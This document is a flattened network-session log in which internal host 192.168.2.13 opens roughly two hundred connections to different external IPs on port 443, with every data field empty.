                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17927192.168.2.1353422142.77.196.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17928192.168.2.134965289.218.150.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17929192.168.2.1333240151.55.146.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17930192.168.2.134896871.24.24.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17931192.168.2.134564261.62.125.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17932192.168.2.1338000190.99.166.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17933192.168.2.1341108142.171.132.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17934192.168.2.1334524195.48.14.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17935192.168.2.1343046196.16.61.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17936192.168.2.134295873.193.96.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17937192.168.2.1356148113.246.186.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17938192.168.2.133859888.63.127.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17939192.168.2.1355612188.31.25.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17940192.168.2.1347664146.15.218.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17941192.168.2.1342720119.196.41.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17942192.168.2.1344318201.200.61.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17943192.168.2.1359416183.112.10.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17944192.168.2.1360050218.153.167.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17945192.168.2.1358418181.79.44.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17946192.168.2.135454866.222.111.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17947192.168.2.1353054113.136.231.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17948192.168.2.134061650.222.11.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17949192.168.2.133953823.229.237.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17950192.168.2.135776843.12.96.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17951192.168.2.1342630118.128.136.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17952192.168.2.135178013.160.217.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17953192.168.2.1337944187.236.194.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17954192.168.2.134694470.163.61.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17955192.168.2.135700044.153.238.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17956192.168.2.1355660182.106.188.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17957192.168.2.1338660186.218.81.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17958192.168.2.135718874.91.193.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17959192.168.2.1356786163.233.155.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17960192.168.2.1351014104.170.135.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17961192.168.2.135418445.156.48.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17962192.168.2.1334202168.72.203.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17963192.168.2.133352849.240.219.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17964192.168.2.1333574220.0.239.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17965192.168.2.1350004186.23.112.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17966192.168.2.135657892.88.118.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17967192.168.2.133846465.167.29.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17968192.168.2.1359490162.233.231.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17969192.168.2.1353224200.247.89.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17970192.168.2.135840634.33.32.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17971192.168.2.1334304142.174.66.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17972192.168.2.1340958131.41.138.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17973192.168.2.13553522.146.191.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17974192.168.2.134373260.146.145.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17975192.168.2.1350006203.191.100.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17976192.168.2.134974423.159.191.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17977192.168.2.1339298223.213.101.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17978192.168.2.135113852.205.184.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17979192.168.2.1348406110.38.103.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17980192.168.2.1359094173.164.73.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17981192.168.2.1338932200.133.30.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17982192.168.2.133847640.145.249.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17983192.168.2.135211637.219.104.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17984192.168.2.13527748.153.166.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17985192.168.2.135190065.222.152.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17986192.168.2.1338618119.31.81.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17987192.168.2.134157288.86.136.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17988192.168.2.1346826183.224.53.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17989192.168.2.1359758205.54.176.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17990192.168.2.1355988111.116.36.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17991192.168.2.135421685.56.141.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17992192.168.2.133345275.184.109.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17993192.168.2.135011466.211.220.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17994192.168.2.1334826104.233.60.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17995192.168.2.136055273.123.163.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17996192.168.2.133796494.97.254.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17997192.168.2.133292676.172.13.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17998192.168.2.135568485.178.77.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17999192.168.2.1345650208.174.34.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18000192.168.2.133338071.239.3.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18001192.168.2.1342278197.143.195.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18002192.168.2.1357436117.93.135.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18003192.168.2.1345716161.235.210.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18004192.168.2.1349466141.97.55.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18005192.168.2.1358210156.133.212.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18006192.168.2.135461437.210.56.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18007192.168.2.1356402145.67.32.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18008192.168.2.1337236172.46.136.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18009192.168.2.134485285.55.20.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18010192.168.2.134496638.183.235.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18011192.168.2.1360126131.128.235.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18012192.168.2.1355850148.181.160.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18013192.168.2.1358600108.176.84.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18014192.168.2.135637220.25.161.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18015192.168.2.135475068.48.171.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18016192.168.2.13496564.199.160.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18017192.168.2.1333894200.72.5.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18018192.168.2.1350630165.72.101.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18019192.168.2.1334960108.93.143.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18020192.168.2.133479237.124.105.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18021192.168.2.1353326195.232.163.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18022192.168.2.1345406223.178.162.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18023192.168.2.135048027.93.103.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18024192.168.2.1357788134.189.163.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18025192.168.2.1342248114.162.204.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18026192.168.2.1349148146.59.180.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18027192.168.2.133733048.212.126.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18028192.168.2.133993248.0.52.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18029192.168.2.1346296142.26.7.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18030192.168.2.1337656139.34.59.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18031192.168.2.1340710212.226.196.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18032192.168.2.1349978133.185.218.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18033192.168.2.134571491.43.104.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18034192.168.2.135147062.108.206.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18035192.168.2.1336528148.154.200.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18036192.168.2.1354648109.148.175.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18037192.168.2.135739475.44.57.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18038192.168.2.1340912155.203.198.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18039192.168.2.1342046208.244.17.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18040192.168.2.1349340131.195.185.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18041192.168.2.1354688175.161.111.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18042192.168.2.1351952163.144.200.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18043192.168.2.1356026221.44.209.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18044192.168.2.135951274.80.125.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18045192.168.2.135358896.255.155.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18046192.168.2.133992668.138.113.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18047192.168.2.1355814199.191.130.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18048192.168.2.1335570174.196.57.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18049192.168.2.1335258118.33.158.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18050192.168.2.133902817.110.141.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18051192.168.2.1358730167.27.192.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18052192.168.2.135816013.163.15.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18053192.168.2.1338994147.151.129.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18054192.168.2.1344392107.166.206.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18055192.168.2.1333366211.236.179.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18056192.168.2.1342820155.206.173.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18057192.168.2.135573814.135.14.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18058192.168.2.135396852.110.198.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18059192.168.2.1353716189.144.181.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18060192.168.2.1346558118.137.249.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18061192.168.2.1353976155.58.144.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18062192.168.2.135464218.114.50.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18063192.168.2.135036285.69.199.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18064192.168.2.1345068111.167.229.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18065192.168.2.1335114118.201.38.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18066192.168.2.135200618.201.0.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18067192.168.2.1341892184.175.186.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18068192.168.2.1343872155.160.212.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18069192.168.2.135589846.119.25.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18070192.168.2.134573086.70.165.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18071192.168.2.134268489.222.80.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18072192.168.2.134185046.36.142.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18073192.168.2.1356320202.120.195.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18074192.168.2.13347125.101.149.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18075192.168.2.1350138110.144.172.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18076192.168.2.1351370149.106.226.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18077192.168.2.1343446158.99.197.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18078192.168.2.1344572193.191.152.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18079192.168.2.1351564106.124.59.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18080192.168.2.1357644125.218.148.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18081192.168.2.135157475.50.210.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18082192.168.2.1343978208.31.184.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18083192.168.2.1333908124.154.253.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18084192.168.2.1345970110.26.36.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18085192.168.2.1343488144.237.220.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18086192.168.2.135804217.148.237.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18087192.168.2.135802444.6.31.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18088192.168.2.133755689.236.3.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18089192.168.2.133287050.134.161.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18090192.168.2.136000698.176.6.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18091192.168.2.1360386123.250.147.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18092192.168.2.1359442150.148.210.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18093192.168.2.133851440.14.87.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18094192.168.2.13490841.20.81.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18095192.168.2.1343964175.102.143.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18096192.168.2.1347240130.4.169.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18097192.168.2.1343830206.10.253.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18098192.168.2.134446278.190.53.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18099192.168.2.1356276164.139.86.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18100192.168.2.133815096.242.217.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18101192.168.2.135880887.144.160.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18102192.168.2.134859625.221.136.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18103192.168.2.135016889.201.79.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18104192.168.2.134462686.113.232.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18105192.168.2.13498649.156.140.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18106192.168.2.1348802176.191.71.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18107192.168.2.134997682.204.50.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18108192.168.2.1339196161.102.104.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18109192.168.2.1354576176.240.35.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18110192.168.2.1343830102.14.113.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18111192.168.2.1342614198.250.190.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18112192.168.2.1351346142.100.168.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18113192.168.2.1336410195.85.224.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18114192.168.2.133582662.81.146.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18115192.168.2.1335588154.239.130.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18116192.168.2.135888466.135.202.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18117192.168.2.135317663.216.170.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18118192.168.2.1341074213.140.14.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18119192.168.2.133607838.89.60.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18120192.168.2.1338330100.14.116.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18121192.168.2.1355968183.163.64.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18122192.168.2.133957265.102.204.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18123192.168.2.13454284.124.121.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18124192.168.2.1355030191.109.203.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18125192.168.2.135403065.140.245.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18126192.168.2.133304837.124.225.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18127192.168.2.1355362192.10.192.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18128192.168.2.1334858182.235.157.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18129192.168.2.1339010173.42.66.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18130192.168.2.1335414113.128.84.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18131192.168.2.1337244177.32.170.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18132192.168.2.1346978144.47.233.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18133192.168.2.1337212185.216.126.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18134192.168.2.1333962101.72.174.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18135192.168.2.1352326118.100.244.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18136192.168.2.1336816140.64.164.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18137192.168.2.135505488.113.59.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18138192.168.2.1356506163.88.27.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
